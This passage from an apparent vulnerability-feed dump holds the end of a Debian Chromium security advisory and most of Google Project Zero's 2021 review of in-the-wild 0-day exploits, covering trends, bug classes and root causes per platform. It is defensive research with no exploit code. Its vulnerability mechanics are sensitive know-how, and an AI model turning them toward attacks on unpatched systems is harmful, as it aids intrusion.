implementation.\n\nCVE-2021-21212\n\n Hugo Hue and Sze Yui Chau discovered an error in the network configuration\n user interface.\n\nCVE-2021-21213\n\n raven discovered a use-after-free issue in the WebMIDI implementation.\n\nCVE-2021-21214\n\n A use-after-free issue was discovered in the networking implementation.\n\nCVE-2021-21215\n\n Abdulrahman Alqabandi discovered an error in the Autofill feature.\n\nCVE-2021-21216\n\n Abdulrahman Alqabandi discovered an error in the Autofill feature.\n\nCVE-2021-21217\n\n Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\nCVE-2021-21218\n\n Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\nCVE-2021-21219\n\n Zhou Aiting discovered use of uninitialized memory in the pdfium library.\n\nCVE-2021-21221\n\n Guang Gong discovered insufficient validation of untrusted input.\n\nCVE-2021-21222\n\n Guang Gong discovered a buffer overflow issue in the v8 javascript\n library.\n\nCVE-2021-21223\n\n Guang Gong discovered an integer overflow issue.\n\nCVE-2021-21224\n\n Jose Martinez discovered a type error in the v8 javascript library.\n\nCVE-2021-21225\n\n Brendon Tiszka discovered an out-of-bounds memory access issue in the v8\n javascript library.\n\nCVE-2021-21226\n\n Brendon Tiszka discovered a use-after-free issue in the networking\n implementation.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 90.0.4430.85-1~deb10u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-28T01:49:06", "type": "debian", "title": "[SECURITY] [DSA 4906-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-04-28T01:49:06", "id": "DEBIAN:DSA-4906-1:4BE22", "href": "https://lists.debian.org/debian-security-announce/2021/msg00087.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2022-08-16T01:57:26", "description": "A Year in Review of 0-days Used In-the-Wild in 2021\n\nPosted by Maddie Stone, Google Project Zero\n\nThis is our third annual year in review of 0-days exploited in-the-wild [[2020](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>), [2019](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>)]. Each year we\u2019ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in the analysis of individual exploits, please check out our [root cause analysis repository](<https://googleprojectzero.blogspot.com/p/rca.html>).\n\nWe perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard [over](<https://forbiddenstories.org/about-the-pegasus-project/>) and [over](<https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/>) and [over](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>) about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans\u2019 lives.\n\nWe\u2019ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.\n\n# Executive Summary\n\n2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That\u2019s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We\u2019ve tracked publicly known in-the-wild 0-day exploits in [this spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) since mid-2014.\n\nWhile we often talk about the number of 0-day exploits used in-the-wild, what we\u2019re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.\n\nWith this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn\u2019t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero\u2019s mission is \u201cmake 0day hard\u201d. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.\n\nSo while we recognize the industry\u2019s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there\u2019s a lot more improving to be done. Having access to more \u201cground truth\u201d of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.\n\nWe had so many more data points in 2021 to learn about attacker behavior than we\u2019ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they\u2019re using or what percentage of 0-days we\u2019re missing in our tracking, so we\u2019ll never know exactly what proportion of 0-days are currently being found and disclosed publicly. \n\nBased on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:\n\n 1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.\n 2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.\n\n# A Record Year for In-the-Wild 0-days\n\n2021 was a record year for in-the-wild 0-days. So what happened?\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC72HVhQEdwHNIzMiyb18bUFr6hPCWJiKL2Mm43-tW11qc0ucOPI8A9oChEXQe0-QNOBF83SIcfyjcyvPveuWvgipbiBzHWqZTx2-LilJFYIbx6uQeno9f481HJQ0CgylQkh8Ks7AbGC6tjhYDNBcI7jh6ihhzJATA0r_P4bQUBm-1lmHp2DPvWM6I/s1200/image1%287%29.png>)\n\nIs it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.\n\nWhile we often talk about \u201c0-day exploits used in-the-wild\u201d, what we\u2019re actually tracking are \u201c0-day exploits detected and disclosed as used in-the-wild\u201d. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry. \n\nOverall, we can break down the uptick in the number of in-the-wild 0-days into:\n\n * More detection of in-the-wild 0-day exploits\n * More public disclosure of in-the-wild 0-day exploitation\n\n## More detection\n\nIn the [2019 Year in Review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we wrote about the \u201cDetection Deficit\u201d. We stated \u201cAs a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\u201d In the last two years, we believe that there\u2019s been progress on this gap. \n\nAnecdotally, we hear from more people that they\u2019ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we\u2019re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMbFpoEKSSn5AbAzsovaZ0yN6_OFXo9u4hpDCXJBpro8LRUWJlVQ9CSqtzT2V9ohrhOvP3_RnrYsOzFGPK0FZGJmW2713g2vVW82ReJVXpjAZc57BCxtHg8i-6AdR_ThDZB6UKvzAKekbmAkuUBliMyDyWSBW87z4ZZQJC3KX-_ptZIHveotLGoJ9I/s1200/image5%284%29.png>)\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRS0t_2Bwvc3U_EIr5h7NcWpQyjzHCPb4OMiDpzPxPs587otAEj8bzwch8UMFlgKchwdSq4L_PXRn1O6KGLHUl4X9voLBdZJNQsgQyJcMCVB4Y8-aRHaXRpOYZw7KVtyNYwdWpwX8ILUV1fyG2kDsXVWORsSPUBGVTON90gWf9POhhxA4edxNe1eoV/s1200/image2%285%29.png>)\n\nWe\u2019ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it\u2019s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!\n\n## More disclosure\n\nThe second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate \u201cGoogle Android\u201d rather than just \u201cGoogle\u201d because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don\u2019t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by \u201cAnonymous\u201d reporters. If the reporters didn\u2019t want credit for the vulnerability, it\u2019s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn\u2019t have been included in this year\u2019s list if Apple and Google Android had not begun transparently annotating their security advisories. \n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPe_J-0Wu9Ap-0n3Yj5BoXiWTnjViyyGasIChhb3juADZosK9nTbyiaWtzuRyjwG3frQNjLsvRMRoQHrFfo1iKa3GjmcuLHqat40GcoechQ16XbhpVGwF7m_TJ0Oucvy3wvm8x0aXbVnJfhkG2FNkxI4cJf5ONBqEYnPxQDUmZChvByLHE8OzSU20N/s1200/image3%287%29.png>)\n\nKudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for [CVE-2021-41773](<https://httpd.apache.org/security/vulnerabilities_24.html>) this past year. \n\nIn-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor\u2019s own security advisories.\n\nIt's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we\u2019re confident that all vendors are transparently disclosing in-the-wild status, there\u2019s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.\n\n# New Year, Old Techniques\n\nWe had a record number of \u201cdata points\u201d in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit \u201cshapes\u201d previously seen in public research. Once \u201c0-day is hard\u201d, we\u2019d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty \u201c[meh](<https://www.dictionary.com/browse/meh#:~:text=unimpressive%3B%20boring%3A>)\u201d or standard.\n\nOut of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it\u2019s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:\n\n * 17 use-after-free\n * 6 out-of-bounds read & write\n * 4 buffer overflow\n * 4 integer overflow\n\nIn the next sections we\u2019ll dive into each major platform that we saw in-the-wild 0-days for this year. We\u2019ll share the trends and explain why what we saw was pretty unexceptional.\n\n## Chromium (Chrome)\n\nChromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.\n\nThe 14 0-day vulnerabilities were in the following components:\n\n * 6 JavaScript Engine - v8 ([CVE-2021-21148](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>), [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>), [CVE-2021-37975](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-37975.html>), [CVE-2021-38003](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>))\n * 2 DOM Engine - Blink ([CVE-2021-21193](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) & [CVE-2021-21206](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>))\n * 1 WebGL ([CVE-2021-30554](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html>))\n * 1 IndexedDB ([CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>))\n * 1 webaudio ([CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>))\n * 1 Portals ([CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>))\n * 1 Android Intents ([CVE-2021-38000](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-38000.html>))\n * 1 Core ([CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>))\n\nWhen we look at the components targeted by these bugs, they\u2019re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.\n\nA couple of the Chromium bugs were even similar to previous in-the-wild 0-days. [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>) is an issue in ScriptProcessorNode::Process() in webaudio where there\u2019s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. [CVE-2019-13720](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-13720.html>) is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.\n\n[CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) is another Chromium in-the-wild 0-day from 2021. It\u2019s a type confusion in the TurboFan JIT in Chromium\u2019s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) in particular deals with code that stores global properties. [CVE-2020-16009](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-16009.html>) was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.\n\n## WebKit (Safari)\n\nPrior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due the sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don\u2019t have historical samples to go off of. Instead, we\u2019ll look at 2021\u2019s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days. \n\nThe 7 in-the-wild 0-days targeted the following components:\n\n * 4 Javascript Engine - JavaScript Core ([CVE-2021-1870](<https://support.apple.com/en-us/HT212146>), [CVE-2021-1871](<https://support.apple.com/en-us/HT212146>), [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>), [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>))\n * 1 IndexedDB ([CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>))\n * 1 Storage ([CVE-2021-30661](<https://support.apple.com/en-us/HT212317>))\n * 1 Plugins ([CVE-2021-1879](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1879.html>))\n\nThe one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021. \n\nIt would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there\u2019s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>), also existed in WebKit and was fixed as [CVE-2021-1844](<https://support.apple.com/en-us/HT212223>), though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, [CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>), was very, very similar to a [bug fixed in Chromium in January 2020](<https://bugs.chromium.org/p/chromium/issues/detail?id=1032890>).\n\n## Internet Explorer\n\nSince we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we\u2019ve ever tracked even though Internet Explorer\u2019s market share of web browser users continues to decrease.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbMTlnGhVLcVL8K20S3s6hSrpyB6kZAA9CWvWNpn1isbEbLFv0c2rs_dPvM0ALT45NtTvyhp8rGehGDRIAEJ6OZYSkk5mezOEoPJOquVXXyHeqrVOvRGEiQHv_J7Je8Itjc5qhwXMCR-E4y79abuxiddCYoeF2VrVakY-L1q82NeMEPjTA0fFC-t8h/s1200/image4%286%29.png>)\n\nSo why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn\u2019t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we\u2019ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats. \n\nThe four 0-days targeted the following components:\n\n * MSHTML browser engine ([CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>), [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-33742.html>), [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>))\n * Javascript Engine - JScript9 ([CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>))\n\nFor [CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) targets of the campaign initially received a .mht file, which prompted the user to open in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) and [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) were delivered to targets via malicious Office documents.\n\n[CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) and [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) were two common memory corruption bug patterns: a use-after-free due to a user controlled callback in between two actions using an object and the user frees the object during that callback and a buffer overflow.\n\nThere were a few different vulnerabilities used in the exploit chain that used [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.\n\n## Windows\n\nWindows is the platform where we\u2019ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and predicted with the end-of-life of Windows 7 in 2020 and thus why it\u2019s still not especially novel.\n\nIn 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:\n\n * 2 Enhanced crypto provider ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>), [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>))\n * 2 NTOS kernel ([CVE-2021-33771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33771>), [CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>))\n * 2 Win32k ([CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>), [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>))\n * 1 Windows update medic ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)) \n * 1 SuperFetch ([CVE-2021-31955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31955>))\n * 1 dwmcore.dll ([CVE-2021-28310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>))\n * 1 ntfs.sys ([CVE-2021-31956](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31956>))\n\nThe number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.\n\nSimilar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn\u2019t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, [CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>), is due to [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) is a use-after-free in NtGdiResetDC due to the object being freed during the user callback. \n\n## iOS/macOS\n\nAs discussed in the \u201cMore disclosure\u201d section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day ([CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>)) was also found. In this section we\u2019re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPGaOlQUGIYyvpDY_M0rGh3JekH4mwXHfN459HYcklg74v4Mfp8j6fgh2SM09mjhA4svdgN_TdSN3R5Bb-DJTHnlo63qnRTsvLs1EZgAE3fBpRtsZhxKhyBNTb_khdS6mNT3EtSHnS_R-TshtHx-gSWnEPpHjmSqO_9Y7JxupGcDKZ0-xwsxgbX6zR/s1200/image6%284%29.png>)\n\nFor the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:\n\n * IOMobileFrameBuffer ([CVE-2021-30807](<https://support.apple.com/en-us/HT212623>), [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>))\n * XNU Kernel ([CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) & [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>))\n * CoreGraphics ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>))\n * CommCenter ([FORCEDENTRY sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>) \\- CVE requested, not yet assigned)\n\nThese 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used [CVE-2016-4654](<https://www.blackhat.com/docs/us-16/materials/us-16-Wang-Pangu-9-Internals.pdf>), a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen\u2019s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP. It\u2019s a popular attack surface because historically it\u2019s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. [CVE-2021-30807](<https://support.apple.com/en-us/HT212623>) is an out-of-bounds read and [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>) is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, [CVE-2022-22587](<https://support.apple.com/en-us/HT213053>).\n\nOne iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU\u2019s inter-process communication (IPC) functionality. [CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) exploited a vulnerability in mach vouchers while [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) exploited a vulnerability in mach messages. This is not the first time we\u2019ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. [CVE-2019-6625](<https://support.apple.com/en-us/HT209443>) was exploited as a part of [an exploit chain targeting iOS 11.4.1-12.1.2](<https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-5.html>) and was also a [vulnerability in mach vouchers](<https://googleprojectzero.blogspot.com/2019/01/voucherswap-exploiting-mig-reference.html>). \n\nMach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>) & [CVE-2020-27950](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27950.html>). This year\u2019s [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) is a pretty close variant to 2020\u2019s [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>). Tielei Wang and Xinru Chi actually [presented on this vulnerability at zer0con 2021](<https://github.com/wangtielei/Slides/blob/main/zer0con21.pdf>) in April 2021. In their presentation, they explained that they found it while doing variant analysis on 